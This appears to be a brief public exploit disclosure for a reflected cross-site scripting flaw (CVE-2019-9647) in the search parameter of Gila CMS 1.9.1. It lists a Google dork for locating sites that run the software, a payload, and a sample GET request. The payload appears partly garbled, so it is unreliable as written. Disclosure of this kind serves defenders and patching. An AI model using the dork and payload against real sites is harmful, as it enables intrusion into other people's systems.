# Exploit Title: Gila CMS (search) Cross Site Scripting # Google Dork: intext:"Powered By Gila CMS" # Date: 11.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://gilacms.com # Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip # Demo Site: https://gilacms.com/demo/ # Version: 1.9.1 # Tested on: Kali Linux # CVE: CVE-2019-9647 # Vulnerable Parameter: search # Payload: <--` --!> # GET Request: http://localhost/?search=<--` --!>